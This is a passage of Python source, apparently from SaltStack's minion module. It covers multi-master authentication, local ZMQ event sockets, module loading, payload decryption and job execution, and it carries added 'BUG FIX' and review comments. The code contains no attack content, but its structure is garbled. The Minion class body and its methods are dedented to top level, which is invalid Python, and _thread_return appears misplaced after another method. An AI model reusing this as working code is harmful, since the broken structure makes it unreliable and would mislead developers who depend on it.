        # this function accepts **kwargs, pack in the publish data
        for key, val in six.iteritems(data):
            _kwargs['__pub_{0}'.format(key)] = val
    return _args, _kwargs
class SMinion(object):
    '''
    Create an object that has loaded all of the minion module functions,
    grains, modules, returners etc. The SMinion allows developers to
    generate all of the salt minion functions and present them with these
    functions for general use.
    '''
    def __init__(self, opts):
        # Late setup of the opts grains, so we can log from the grains module
        opts['grains'] = salt.loader.grains(opts)
        self.opts = opts

        # Clean out the proc directory (default /var/cache/salt/minion/proc)
        if (self.opts.get('file_client', 'remote') == 'remote'
                or self.opts.get('use_master_when_local', False)):
            if isinstance(self.opts['master'], list):
                # Multi-master: try each master in turn (optionally in a
                # random order) until module generation succeeds.
                masters = self.opts['master']
                if self.opts['random_master'] is True:
                    shuffle(masters)
                for master in masters:
                    self.opts['master'] = master
                    self.opts.update(resolve_dns(opts))
                    try:
                        self.gen_modules()
                        break
                    except SaltClientError:
                        log.warning(('Attempted to authenticate with master '
                                     '{0} and failed'.format(master)))
                        continue
            else:
                if self.opts['random_master'] is True:
                    log.warning('random_master is True but there is only one master specified. Ignoring.')
                self.opts.update(resolve_dns(opts))
                self.gen_modules(initial_load=True)
        else:
            # Purely local setup: no master resolution needed.
            self.gen_modules(initial_load=True)

    def gen_modules(self, initial_load=False):
        '''
        Load all of the modules for the minion: pillar, execution
        functions, returners, states, renderers and the matcher.
        '''
        self.opts['pillar'] = salt.pillar.get_pillar(
            self.opts,
            self.opts['grains'],
            self.opts['id'],
            self.opts['environment']
        ).compile_pillar()
        self.functions = salt.loader.minion_mods(self.opts, include_errors=True)
        # TODO: remove
        self.function_errors = {}  # Keep the funcs clean
        self.returners = salt.loader.returners(self.opts, self.functions)
        self.states = salt.loader.states(self.opts, self.functions)
        self.rend = salt.loader.render(self.opts, self.functions)
        self.matcher = Matcher(self.opts, self.functions)
        # Allow a live reload of all modules through the loaded functions.
        self.functions['sys.reload_modules'] = self.gen_modules
class MinionBase(object):
    '''
    Shared plumbing for the minion classes: ZMQ context/poller setup,
    the local minion event pub/pull sockets, and scheduler/beacon
    helpers.
    '''
    def __init__(self, opts):
        self.opts = opts

    def _init_context_and_poller(self):
        # One ZMQ context and poller per minion instance.
        self.context = zmq.Context()
        self.poller = zmq.Poller()

    def _prepare_minion_event_system(self):
        # Prepare the minion event system
        #
        # Start with the publish socket
        self._init_context_and_poller()

        hash_type = getattr(hashlib, self.opts.get('hash_type', 'md5'))
        # Only use the first 10 chars to keep longer hashes from exceeding the
        # max socket path length.
        id_hash = hash_type(self.opts['id']).hexdigest()[:10]
        epub_sock_path = os.path.join(
            self.opts['sock_dir'],
            'minion_event_{0}_pub.ipc'.format(id_hash)
        )
        if os.path.exists(epub_sock_path):
            # Remove stale socket files from a previous run.
            os.unlink(epub_sock_path)
        epull_sock_path = os.path.join(
            self.opts['sock_dir'],
            'minion_event_{0}_pull.ipc'.format(id_hash)
        )
        if os.path.exists(epull_sock_path):
            os.unlink(epull_sock_path)

        self.epub_sock = self.context.socket(zmq.PUB)

        if self.opts.get('ipc_mode', '') == 'tcp':
            # TCP mode: loopback sockets instead of unix domain sockets.
            epub_uri = 'tcp://127.0.0.1:{0}'.format(
                self.opts['tcp_pub_port']
            )
            epull_uri = 'tcp://127.0.0.1:{0}'.format(
                self.opts['tcp_pull_port']
            )
        else:
            epub_uri = 'ipc://{0}'.format(epub_sock_path)
            salt.utils.zeromq.check_ipc_path_max_len(epub_uri)
            epull_uri = 'ipc://{0}'.format(epull_sock_path)
            salt.utils.zeromq.check_ipc_path_max_len(epull_uri)

        log.debug(
            '{0} PUB socket URI: {1}'.format(
                self.__class__.__name__, epub_uri
            )
        )
        log.debug(
            '{0} PULL socket URI: {1}'.format(
                self.__class__.__name__, epull_uri
            )
        )

        # Check to make sure the sock_dir is available, create if not
        default_minion_sock_dir = os.path.join(
            salt.syspaths.SOCK_DIR,
            'minion'
        )
        minion_sock_dir = self.opts.get('sock_dir', default_minion_sock_dir)

        if not os.path.isdir(minion_sock_dir):
            # Let's try to create the directory defined on the configuration
            # file
            try:
                os.makedirs(minion_sock_dir, 0o755)
            except OSError as exc:
                log.error('Could not create SOCK_DIR: {0}'.format(exc))
                # Let's not fail yet and try using the default path
                if minion_sock_dir == default_minion_sock_dir:
                    # We're already trying the default system path, stop now!
                    raise
                if not os.path.isdir(default_minion_sock_dir):
                    try:
                        os.makedirs(default_minion_sock_dir, 0o755)
                    except OSError as exc:
                        log.error('Could not create SOCK_DIR: {0}'.format(exc))
                        # Let's stop at this stage
                        raise

        # Create the pull socket
        self.epull_sock = self.context.socket(zmq.PULL)

        # Securely bind the event sockets
        if self.opts.get('ipc_mode', '') != 'tcp':
            # Restrict the unix socket files to the owner while binding.
            old_umask = os.umask(0o177)
        try:
            log.info('Starting pub socket on {0}'.format(epub_uri))
            self.epub_sock.bind(epub_uri)
            log.info('Starting pull socket on {0}'.format(epull_uri))
            self.epull_sock.bind(epull_uri)
        finally:
            if self.opts.get('ipc_mode', '') != 'tcp':
                os.umask(old_umask)

    @staticmethod
    def process_schedule(minion, loop_interval):
        # Run any due scheduled jobs; the schedule may require a shorter
        # polling interval than the configured one, in which case the
        # (possibly lowered) interval is returned to the caller.
        try:
            minion.schedule.eval()
            # Check if scheduler requires lower loop interval than
            # the loop_interval setting
            if minion.schedule.loop_interval < loop_interval:
                loop_interval = minion.schedule.loop_interval
                log.debug(
                    'Overriding loop_interval because of scheduled jobs.'
                )
        except Exception as exc:
            # Scheduled-job failures must not kill the minion loop.
            log.error(
                'Exception {0} occurred in scheduled job'.format(exc)
            )
        return loop_interval

    def process_beacons(self, functions):
        '''
        Evaluate all of the configured beacons, grab the config again in case
        the pillar or grains changed
        '''
        if 'config.merge' in functions:
            b_conf = functions['config.merge']('beacons')
            if b_conf:
                return self.beacons.process(b_conf)
        return []
class MasterMinion(object):
    '''
    A fully loaded minion function object for generic use on the master.

    Unlike a regular minion no pillar is compiled; everything else
    (functions, and optionally returners, states, renderers and the
    matcher) is loaded cleanly from the master's minion configuration.
    '''
    def __init__(
            self,
            opts,
            returners=True,
            states=True,
            rend=True,
            matcher=True,
            whitelist=None):
        self.opts = salt.config.minion_config(opts['conf_file'])
        self.opts.update(opts)
        self.whitelist = whitelist
        self.opts['grains'] = salt.loader.grains(opts)
        # The master-side minion never carries pillar data.
        self.opts['pillar'] = {}
        self.mk_returners = returners
        self.mk_states = states
        self.mk_rend = rend
        self.mk_matcher = matcher
        self.gen_modules(initial_load=True)

    def gen_modules(self, initial_load=False):
        '''
        (Re)load the execution modules plus any optional subsystems
        requested at construction time.
        '''
        self.functions = salt.loader.minion_mods(
            self.opts,
            whitelist=self.whitelist,
            initial_load=initial_load)
        # Optional subsystems, loaded in the same order as before:
        # (attribute name, enabled flag, loader callable)
        optional_subsystems = (
            ('returners', self.mk_returners,
             lambda: salt.loader.returners(self.opts, self.functions)),
            ('states', self.mk_states,
             lambda: salt.loader.states(self.opts, self.functions)),
            ('rend', self.mk_rend,
             lambda: salt.loader.render(self.opts, self.functions)),
            ('matcher', self.mk_matcher,
             lambda: Matcher(self.opts, self.functions)),
        )
        for attr_name, enabled, build in optional_subsystems:
            if enabled:
                setattr(self, attr_name, build())
        # Allow a live reload of all modules through the loaded functions.
        self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
    '''
    Create a multi minion interface, this creates as many minions as are
    defined in the master option and binds each minion object to a respective
    master.
    '''
    # timeout for one of the minions to auth with a master
    MINION_CONNECT_TIMEOUT = 5

    def __init__(self, opts):
        super(MultiMinion, self).__init__(opts)

    def minions(self):
        '''
        Return a dict of minion generators bound to the tune_in method.

        Maps master -> mapping with the keys:
            opts: options used to create the minion
            last: last auth attempt time
            auth_wait: time to wait for next auth attempt
            minion: minion object (absent when the initial auth failed)
            generator: generator function (non-blocking tune_in)
        '''
        if not isinstance(self.opts['master'], list):
            log.error(
                'Attempting to start a multimaster system with one master')
            sys.exit(salt.defaults.exitcodes.EX_GENERIC)
        ret = {}
        for master in set(self.opts['master']):
            s_opts = copy.copy(self.opts)
            s_opts['master'] = master
            s_opts['multimaster'] = True
            ret[master] = {'opts': s_opts,
                           'last': time.time(),
                           'auth_wait': s_opts['acceptance_wait_time']}
            try:
                minion = Minion(s_opts, self.MINION_CONNECT_TIMEOUT, False)
                ret[master]['minion'] = minion
                ret[master]['generator'] = minion.tune_in_no_block()
            except SaltClientError as exc:
                # Leave the entry without 'minion'/'generator'; tune_in()
                # keeps retrying the connection later.
                log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(master))
        return ret

    # Multi Master Tune In
    def tune_in(self):
        '''
        Bind to the masters
        This loop will attempt to create connections to masters it hasn't connected
        to yet, but once the initial connection is made it is up to ZMQ to do the
        reconnect (don't know of an API to get the state here in salt)
        '''
        self._prepare_minion_event_system()
        self.poller.register(self.epull_sock, zmq.POLLIN)

        # Prepare the minion generators
        minions = self.minions()
        loop_interval = int(self.opts['loop_interval'])
        auth_wait = self.opts['acceptance_wait_time']
        max_wait = self.opts['acceptance_wait_time_max']

        while True:
            package = None

            # Run scheduled jobs on every minion that is already up.
            for minion in six.itervalues(minions):
                if isinstance(minion, dict):
                    # BUG FIX: the mapping has no 'minion' key until the
                    # connection succeeds; use .get() instead of indexing
                    # so pending masters don't raise KeyError here.
                    minion = minion.get('minion')
                if not hasattr(minion, 'schedule'):
                    continue
                loop_interval = self.process_schedule(minion, loop_interval)

            socks = dict(self.poller.poll(1))
            if socks.get(self.epull_sock) == zmq.POLLIN:
                try:
                    package = self.epull_sock.recv(zmq.NOBLOCK)
                except Exception:
                    pass

            masters = list(minions.keys())
            shuffle(masters)
            # Do stuff per minion that we have
            for master in masters:
                minion = minions[master]
                # if we haven't connected yet, lets attempt some more.
                # make sure to keep separate auth_wait times, since these
                # are separate masters
                if 'generator' not in minion:
                    if time.time() - minion['auth_wait'] > minion['last']:
                        minion['last'] = time.time()
                        if minion['auth_wait'] < max_wait:
                            minion['auth_wait'] += auth_wait
                        try:
                            t_minion = Minion(minion['opts'], self.MINION_CONNECT_TIMEOUT, False)
                            minions[master]['minion'] = t_minion
                            minions[master]['generator'] = t_minion.tune_in_no_block()
                            minions[master]['auth_wait'] = self.opts['acceptance_wait_time']
                        except SaltClientError:
                            log.error('Error while bring up minion for multi-master. Is master {0} responding?'.format(master))
                            continue
                    else:
                        continue

                # run scheduled jobs if you have them
                loop_interval = self.process_schedule(minion['minion'], loop_interval)

                # If a minion instance receives event, handle the event on all
                # instances
                if package:
                    try:
                        # BUG FIX: the per-master mapping is a plain dict and
                        # has no handle_event(); the old code called it on the
                        # dict, always raised AttributeError and silently
                        # dropped every event.  Call it on the Minion object
                        # and skip masters that are not connected yet.  Also
                        # use a distinct loop variable so the outer 'master'
                        # is no longer shadowed.
                        for target in masters:
                            if 'minion' in minions[target]:
                                minions[target]['minion'].handle_event(package)
                    except Exception:
                        pass
                    finally:
                        package = None

                # have the Minion class run anything it has to run
                next(minion['generator'])
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True):  # pylint: disable=W0231
    '''
    Pass in the options dict

    timeout -- seconds allowed when authenticating with the master
    safe -- forwarded to authenticate() via eval_master()
    '''
    self._running = None
    # Windows keeps job processes alive; they are tracked here.
    self.win_proc = []

    # Warn if ZMQ < 3.2
    if HAS_ZMQ:
        try:
            zmq_version_info = zmq.zmq_version_info()
        except AttributeError:
            # PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
            # using zmq.zmq_version() and build a version info tuple.
            zmq_version_info = tuple(
                [int(x) for x in zmq.zmq_version().split('.')]
            )
        if zmq_version_info < (3, 2):
            log.warning(
                'You have a version of ZMQ less than ZMQ 3.2! There are '
                'known connection keep-alive issues with ZMQ < 3.2 which '
                'may result in loss of contact with minions. Please '
                'upgrade your ZMQ!'
            )
    # Late setup the of the opts grains, so we can log from the grains
    # module
    opts['grains'] = salt.loader.grains(opts)

    # evaluate the master to connect to and authenticate with it
    # (eval_master also runs MinionBase.__init__, which sets self.opts)
    opts['master'] = self.eval_master(opts,
                                      timeout,
                                      safe)

    self.opts['pillar'] = salt.pillar.get_pillar(
        opts,
        opts['grains'],
        opts['id'],
        opts['environment']
    ).compile_pillar()
    self.functions, self.returners, self.function_errors = self._load_modules()
    self.serial = salt.payload.Serial(self.opts)
    self.mod_opts = self._prep_mod_opts()
    self.matcher = Matcher(self.opts, self.functions)
    self.beacons = salt.beacons.Beacon(opts, self.functions)
    uid = salt.utils.get_uid(user=opts.get('user', None))
    self.proc_dir = get_proc_dir(opts['cachedir'], uid=uid)
    self.schedule = salt.utils.schedule.Schedule(
        self.opts,
        self.functions,
        self.returners)

    # add default scheduling jobs to the minions scheduler
    if 'mine.update' in self.functions:
        log.info('Added mine.update to scheduler')
        self.schedule.add_job({
            '__mine_interval':
            {
                'function': 'mine.update',
                'minutes': opts['mine_interval'],
                'jid_include': True,
                'maxrunning': 2
            }
        })

    # add master_alive job if enabled
    if self.opts['master_alive_interval'] > 0:
        self.schedule.add_job({
            '__master_alive':
            {
                'function': 'status.master',
                'seconds': opts['master_alive_interval'],
                'jid_include': True,
                'maxrunning': 1,
                'kwargs': {'master': self.opts['master'],
                           'connected': True}
            }
        })

    self.grains_cache = self.opts['grains']

    # store your hexid to subscribe to zmq, hash since zmq filters are prefix
    # matches this way we can avoid collisions
    self.hexid = hashlib.sha1(self.opts['id']).hexdigest()

    if 'proxy' in self.opts['pillar']:
        log.debug('I am {0} and I need to start some proxies for {1}'.format(self.opts['id'],
                                                                             self.opts['pillar']['proxy']))
        for p in self.opts['pillar']['proxy']:
            log.debug('Starting {0} proxy.'.format(p))
            # Fork one child per configured proxy: the parent continues
            # this loop, the child becomes the proxy minion and exits via
            # clean_die().
            pid = os.fork()
            if pid > 0:
                continue
            else:
                proxyminion = ProxyMinion(self.opts)
                proxyminion.start(self.opts['pillar']['proxy'][p])
                self.clean_die(signal.SIGTERM, None)
    else:
        log.debug('I am {0} and I am not supposed to start any proxies. '
                  '(Likely not a problem)'.format(self.opts['id']))

    # __init__() from MinionBase is called in Minion.eval_master()
def eval_master(self,
                opts,
                timeout=60,
                safe=True,
                failed=False):
    '''
    Evaluates and returns the current master address. In standard mode, just calls
    authenticate() with the given master address.

    With master_type=func evaluates the current master address from the given
    module and then calls authenticate().

    With master_type=failover takes the list of masters and loops through them.
    The first one that allows the minion to connect is used to authenticate() and
    then returned. If this function is called outside the minions initialization
    phase (for example from the minions main event-loop when a master connection
    loss was detected), 'failed' should be set to True. The current
    (possibly failed) master will then be removed from the list of masters.
    '''
    # check if master_type was altered from its default
    if opts['master_type'] != 'str':
        # check for a valid keyword
        if opts['master_type'] == 'func':
            # split module and function and try loading the module
            mod, fun = opts['master'].split('.')
            try:
                master_mod = salt.loader.raw_mod(opts, mod, fun)
                if not master_mod:
                    raise TypeError
                # we take whatever the module returns as master address
                opts['master'] = master_mod[mod + '.' + fun]()
            except TypeError:
                msg = ('Failed to evaluate master address from '
                       'module \'{0}\''.format(opts['master']))
                log.error(msg)
                sys.exit(salt.defaults.exitcodes.EX_GENERIC)
            log.info('Evaluated master from module: {0}'.format(master_mod))

        # if failover is set, master has to be of type list
        elif opts['master_type'] == 'failover':
            if isinstance(opts['master'], list):
                log.info('Got list of available master addresses:'
                         ' {0}'.format(opts['master']))
                if opts['master_shuffle']:
                    shuffle(opts['master'])
            elif opts['__role'] == 'syndic':
                log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))

            # if failed=True, the minion was previously connected
            # we're probably called from the minions main-event-loop
            # because a master connection loss was detected. remove
            # the possibly failed master from the list of masters.
            elif failed:
                log.info('Removing possibly failed master {0} from list of'
                         ' masters'.format(opts['master']))
                # create new list of master with the possibly failed one removed
                opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]

            else:
                msg = ('master_type set to \'failover\' but \'master\' '
                       'is not of type list but of type '
                       '{0}'.format(type(opts['master'])))
                log.error(msg)
                sys.exit(salt.defaults.exitcodes.EX_GENERIC)
        else:
            msg = ('Invalid keyword \'{0}\' for variable '
                   '\'master_type\''.format(opts['master_type']))
            log.error(msg)
            sys.exit(salt.defaults.exitcodes.EX_GENERIC)

    # if we have a list of masters, loop through them and be
    # happy with the first one that allows us to connect
    if isinstance(opts['master'], list):
        conn = False
        # shuffle the masters and then loop through them
        local_masters = copy.copy(opts['master'])

        for master in local_masters:
            opts['master'] = master
            opts.update(resolve_dns(opts))
            # MinionBase.__init__ is (re)run here so self.opts tracks the
            # master currently being tried.
            super(Minion, self).__init__(opts)

            # on first run, update self.opts with the whole master list
            # to enable a minion to re-use old masters if they get fixed
            if 'master_list' not in self.opts:
                self.opts['master_list'] = local_masters

            try:
                # authenticate() returning 'full' means the master is at
                # connection capacity; anything else counts as success.
                if self.authenticate(timeout, safe) != 'full':
                    conn = True
                    break
            except SaltClientError:
                msg = ('Master {0} could not be reached, trying '
                       'next master (if any)'.format(opts['master']))
                log.info(msg)
                continue

        if not conn:
            # No master reachable: logs the error and implicitly returns
            # None to the caller.
            self.connected = False
            msg = ('No master could be reached or all masters denied '
                   'the minions connection attempt.')
            log.error(msg)
        else:
            self.connected = True
            return opts['master']

    # single master sign in
    else:
        opts.update(resolve_dns(opts))
        super(Minion, self).__init__(opts)
        if self.authenticate(timeout, safe) == 'full':
            self.connected = False
            msg = ('master {0} rejected the minions connection because too '
                   'many minions are already connected.'.format(opts['master']))
            log.error(msg)
            sys.exit(salt.defaults.exitcodes.EX_GENERIC)
        else:
            self.connected = True
            return opts['master']
def _prep_mod_opts(self):
    '''
    Return a shallow copy of ``self.opts`` with the ``logger`` entry
    stripped out, suitable for handing to modules.
    '''
    return {key: val
            for key, val in six.iteritems(self.opts)
            if key != 'logger'}
def _process_beacons(self):
    '''
    Process each beacon and send events if appropriate
    '''
    # Process Beacons
    try:
        beacons = self.process_beacons(self.functions)
    except Exception as exc:
        # Best effort: a beacon failure must never kill the minion loop.
        log.critical('Beacon processing errored: {0}. No beacons will be procssed.'.format(traceback.format_exc(exc)))
        beacons = None
    if beacons:
        # Forward the whole batch to the master, then publish each beacon
        # on the local event bus as well.
        self._fire_master(events=beacons)
        for beacon in beacons:
            serialized_data = salt.utils.dicttrim.trim_dict(
                self.serial.dumps(beacon['data']),
                self.opts.get('max_event_size', 1048576),
                is_msgpacked=True,
            )
            log.debug('Sending event - data = {0}'.format(beacon['data']))
            # Local event wire format: tag + end-of-tag marker + payload.
            event = '{0}{1}{2}'.format(
                beacon['tag'],
                salt.utils.event.TAGEND,
                serialized_data)
            self.handle_event(event)
            self.epub_sock.send(event)
def _load_modules(self, force_refresh=False, notify=False):
    '''
    Return the functions and the returners loaded up from the loader
    module

    force_refresh -- forwarded to the grains loader to force a refresh
    notify -- forwarded to the module loader

    Returns a ``(functions, returners, errors)`` tuple.
    '''
    # if this is a *nix system AND modules_max_memory is set, lets enforce
    # a memory limit on module imports
    # this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
    modules_max_memory = False
    if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
        log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
        modules_max_memory = True
        old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
        rss, vms = psutil.Process(os.getpid()).get_memory_info()
        mem_limit = rss + vms + self.opts['modules_max_memory']
        resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
    elif self.opts.get('modules_max_memory', -1) > 0:
        if not HAS_PSUTIL:
            log.error('Unable to enforce modules_max_memory because psutil is missing')
        if not HAS_RESOURCE:
            log.error('Unable to enforce modules_max_memory because resource is missing')

    self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
    if self.opts.get('multimaster', False):
        # Give each multi-master minion its own opts copy for the loader.
        s_opts = copy.copy(self.opts)
        functions = salt.loader.minion_mods(s_opts, notify=notify)
    else:
        functions = salt.loader.minion_mods(self.opts, notify=notify)
    returners = salt.loader.returners(self.opts, functions)
    errors = {}
    if '_errors' in functions:
        errors = functions['_errors']
        functions.pop('_errors')

    # BUG FIX: functions.clear() and returners.clear() were called here,
    # wiping out everything that was just loaded and handing empty
    # mappings back to the caller (which then checks e.g. 'mine.update'
    # in self.functions).  The freshly loaded mappings must be returned
    # intact.

    # we're done, reset the limits!
    if modules_max_memory is True:
        resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)

    return functions, returners, errors
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60):
    '''
    Fire an event on the master, or drop message if unable to send.

    Exactly one payload shape is selected: ``events`` (a batch), or
    ``data``+``tag``, or a bare ``tag`` with empty data.  With none of
    them the call is a no-op.  Returns True on success, False when the
    send failed, None when nothing was sent.
    '''
    load = {'id': self.opts['id'],
            'cmd': '_minion_event',
            'pretag': pretag,
            'tok': self.tok}
    if events:
        load['events'] = events
    elif data and tag:
        load['data'] = data
        load['tag'] = tag
    elif not data and tag:
        load['data'] = {}
        load['tag'] = tag
    else:
        # Nothing to send.
        return
    channel = salt.transport.Channel.factory(self.opts)
    try:
        # IDIOM: the reply was previously bound to an unused local
        # ('result'); only whether send() raises matters here.
        channel.send(load, timeout=timeout)
        return True
    except Exception:
        log.info('fire_master failed: {0}'.format(traceback.format_exc()))
        return False
def _handle_payload(self, payload):
    '''
    Takes a payload from the master publisher and does whatever the
    master wants done.
    '''
    # Dispatch on the payload's encryption type.  NOTE(review):
    # _handle_pub/_handle_clear accept only (load,) yet are invoked here
    # with (load, sig); presumably dead paths since both are no-ops —
    # confirm before relying on the 'pub'/'clear' branches.
    {'aes': self._handle_aes,
     'pub': self._handle_pub,
     'clear': self._handle_clear}[payload['enc']](payload['load'],
                                                  payload['sig'] if 'sig' in payload else None)
def _handle_aes(self, load, sig=None):
    '''
    Takes the AES encrypted load, checks the signature if pub signatures
    are turned on, decrypts it, and runs the encapsulated instructions
    '''
    # Verify that the signature is valid
    master_pubkey_path = os.path.join(self.opts['pki_dir'], 'minion_master.pub')

    if sig and self.functions['config.get']('sign_pub_messages'):
        if not salt.crypt.verify_signature(master_pubkey_path, load, sig):
            raise AuthenticationError('Message signature failed to validate.')

    try:
        data = self.crypticle.loads(load)
    except AuthenticationError:
        # decryption of the payload failed, try to re-auth
        self.authenticate()
        data = self.crypticle.loads(load)

    # Verify that the publication is valid
    if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
            or 'arg' not in data:
        return
    # Verify that the publication applies to this minion

    # It's important to note that the master does some pre-processing
    # to determine which minions to send a request to. So for example,
    # a "salt -G 'grain_key:grain_val' test.ping" will invoke some
    # pre-processing on the master and this minion should not see the
    # publication if the master does not determine that it should.
    if 'tgt_type' in data:
        match_func = getattr(self.matcher,
                             '{0}_match'.format(data['tgt_type']), None)
        if match_func is None:
            # Unknown target type: silently ignore the publication.
            return
        if data['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
            # These matchers take a key/value delimiter argument.
            delimiter = data.get('delimiter', DEFAULT_TARGET_DELIM)
            if not match_func(data['tgt'], delimiter=delimiter):
                return
        elif not match_func(data['tgt']):
            return
    else:
        if not self.matcher.glob_match(data['tgt']):
            return

    # If the minion does not have the function, don't execute,
    # this prevents minions that could not load a minion module
    # from returning a predictable exception
    #if data['fun'] not in self.functions:
    #    return
    if 'user' in data:
        log.info(
            'User {0[user]} Executing command {0[fun]} with jid '
            '{0[jid]}'.format(data)
        )
    else:
        log.info(
            'Executing command {0[fun]} with jid {0[jid]}'.format(data)
        )
    log.debug('Command details {0}'.format(data))
    self._handle_decoded_payload(data)
def _handle_pub(self, load):
    '''
    Handle public key payloads
    '''
    # Currently a no-op.
    pass
def _handle_clear(self, load):
    '''
    Handle un-encrypted transmissions
    '''
    # Currently a no-op.
    pass
def _handle_decoded_payload(self, data):
    '''
    Override this method if you wish to handle the decoded data
    differently.
    '''
    if isinstance(data['fun'], six.string_types):
        if data['fun'] == 'sys.reload_modules':
            # Reload in-process so the refreshed functions are also
            # visible to the scheduler.
            self.functions, self.returners, self.function_errors = self._load_modules()
            self.schedule.functions = self.functions
            self.schedule.returners = self.returners
    # A tuple/list of functions means a compound job -> multi-return path.
    if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
        target = Minion._thread_multi_return
    else:
        target = Minion._thread_return
    # We stash an instance references to allow for the socket
    # communication in Windows. You can't pickle functions, and thus
    # python needs to be able to reconstruct the reference on the other
    # side.
    instance = self
    # If we are running in multi-master mode, re-inject opts into module funcs
    if instance.opts.get('multimaster', False):
        for func in instance.functions:
            sys.modules[instance.functions[func].__module__].__opts__ = self.opts
    if self.opts['multiprocessing']:
        if sys.platform.startswith('win'):
            # let python reconstruct the minion on the other side if we're
            # running on windows
            instance = None
        process = multiprocessing.Process(
            target=target, args=(instance, self.opts, data)
        )
    else:
        process = threading.Thread(
            target=target,
            args=(instance, self.opts, data),
            name=data['jid']
        )
    process.start()
    if not sys.platform.startswith('win'):
        # NOTE(review): joining immediately presumably relies on the job
        # detaching/daemonizing quickly (see _thread_return); confirm it
        # does not serialize job execution on non-Windows platforms.
        process.join()
    else:
        # Windows job processes are tracked so they can be reaped later.
        self.win_proc.append(process)
    @classmethod
    def _thread_return(cls, minion_instance, opts, data):
        '''
        This method should be used as a threading target, start the actual
        minion side execution.

        Executes the single function named in data['fun'], records the job
        in the minion's proc_dir while it runs, publishes the result to the
        master and finally feeds any returners listed in data['ret'].
        '''
        # this seems awkward at first, but it's a workaround for Windows
        # multiprocessing communication.
        if not minion_instance:
            minion_instance = cls(opts)
        # Job tracking file; removed again by _return_pub when the job ends
        fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
        if opts['multiprocessing']:
            salt.utils.daemonize_if(opts)
        salt.utils.appendproctitle(data['jid'])
        sdata = {'pid': os.getpid()}
        sdata.update(data)
        log.info('Starting a new job with PID {0}'.format(sdata['pid']))
        with salt.utils.fopen(fn_, 'w+b') as fp_:
            fp_.write(minion_instance.serial.dumps(sdata))
        ret = {'success': False}
        function_name = data['fun']
        if function_name in minion_instance.functions:
            try:
                func = minion_instance.functions[data['fun']]
                args, kwargs = load_args_and_kwargs(
                    func,
                    data['arg'],
                    data)
                # Reset the retcode for this execution context
                minion_instance.functions.pack['__context__']['retcode'] = 0
                if opts.get('sudo_user', ''):
                    sudo_runas = opts.get('sudo_user')
                    if 'sudo.salt_call' in minion_instance.functions:
                        return_data = minion_instance.functions['sudo.salt_call'](
                            sudo_runas,
                            data['fun'],
                            *args,
                            **kwargs)
                else:
                    return_data = func(*args, **kwargs)
                if isinstance(return_data, types.GeneratorType):
                    # Generator returns: stream each chunk to the master as a
                    # job progress event while aggregating the final return.
                    # Dict chunks are merged; any other type switches the
                    # aggregate to a list.
                    ind = 0
                    iret = {}
                    for single in return_data:
                        if isinstance(single, dict) and isinstance(iret, dict):
                            iret.update(single)
                        else:
                            if not iret:
                                iret = []
                            iret.append(single)
                        tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
                        event_data = {'return': single}
                        minion_instance._fire_master(event_data, tag)
                        ind += 1
                    ret['return'] = iret
                else:
                    ret['return'] = return_data
                ret['retcode'] = minion_instance.functions.pack['__context__'].get(
                    'retcode',
                    0
                )
                ret['success'] = True
            except CommandNotFoundError as exc:
                msg = 'Command required for {0!r} not found'.format(
                    function_name
                )
                log.debug(msg, exc_info=True)
                ret['return'] = '{0}: {1}'.format(msg, exc)
                ret['out'] = 'nested'
            except CommandExecutionError as exc:
                log.error(
                    'A command in {0!r} had a problem: {1}'.format(
                        function_name,
                        exc
                    ),
                    exc_info_on_loglevel=logging.DEBUG
                )
                ret['return'] = 'ERROR: {0}'.format(exc)
                ret['out'] = 'nested'
            except SaltInvocationError as exc:
                log.error(
                    'Problem executing {0!r}: {1}'.format(
                        function_name,
                        exc
                    ),
                    exc_info_on_loglevel=logging.DEBUG
                )
                ret['return'] = 'ERROR executing {0!r}: {1}'.format(
                    function_name, exc
                )
                ret['out'] = 'nested'
            except TypeError as exc:
                msg = ('TypeError encountered executing {0}: {1}. See '
                       'debug log for more info.').format(function_name, exc)
                log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
                ret['return'] = msg
                ret['out'] = 'nested'
            except Exception:
                # Catch-all: report the traceback as the job return and
                # fire an error event so the failure is visible on the master
                msg = 'The minion function caused an exception'
                log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
                salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
                ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
                ret['out'] = 'nested'
        else:
            # Unknown function: return the standard "missing function"
            # message, enriched with any module load errors we know about
            ret['return'] = minion_instance.functions.missing_fun_string(function_name)
            mod_name = function_name.split('.')[0]
            if mod_name in minion_instance.function_errors:
                ret['return'] += ' Possible reasons: {0!r}'.format(minion_instance.function_errors[mod_name])
            ret['success'] = False
            ret['retcode'] = 254
            ret['out'] = 'nested'
        ret['jid'] = data['jid']
        ret['fun'] = data['fun']
        ret['fun_args'] = data['arg']
        if 'master_id' in data:
            ret['master_id'] = data['master_id']
        if 'metadata' in data:
            if isinstance(data['metadata'], dict):
                ret['metadata'] = data['metadata']
            else:
                log.warning('The metadata parameter must be a dictionary. Ignoring.')
        minion_instance._return_pub(ret)
        if data['ret']:
            if 'ret_config' in data:
                ret['ret_config'] = data['ret_config']
            ret['id'] = opts['id']
            # Feed every configured returner; a returner failure is logged
            # but does not fail the job
            for returner in set(data['ret'].split(',')):
                try:
                    minion_instance.returners['{0}.returner'.format(
                        returner
                    )](ret)
                except Exception as exc:
                    log.error(
                        'The return failed for job {0} {1}'.format(
                            data['jid'],
                            exc
                        )
                    )
